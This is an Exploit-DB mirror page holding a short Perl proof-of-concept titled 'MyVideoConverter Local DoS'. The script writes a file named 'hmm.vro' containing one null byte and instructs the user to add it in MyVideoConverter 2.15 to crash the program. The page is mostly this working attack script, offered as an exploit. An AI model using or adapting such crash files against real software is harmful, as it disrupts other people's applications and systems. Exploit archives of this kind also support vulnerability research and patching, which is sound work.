exploit-db-mirror/exploits/windows/dos/12072.pl
Offensive Security 36c084c351 DB: 2021-09-03
45419 changes to exploits/shellcodes

2 new exploits/shellcodes

Too many to list!
2021-09-03 13:39:06 +00:00

16 lines
No EOL
325 B
Perl
Executable file

# Exploit Title: MyVideoConverter Local DoS
# Date: April 5, 2010
# Software Link: [http://www.ivideogo.com/]
# Version: 2.15
# Tested on: Windows XP SP3
# Author: [anonymous]
#
#!/usr/bin/perl
my $file = "hmm.vro";
my $null = "\x00";
open (FILE, ">$file");
print FILE "$null";
print "Done. . . Add file -> click Start.\n"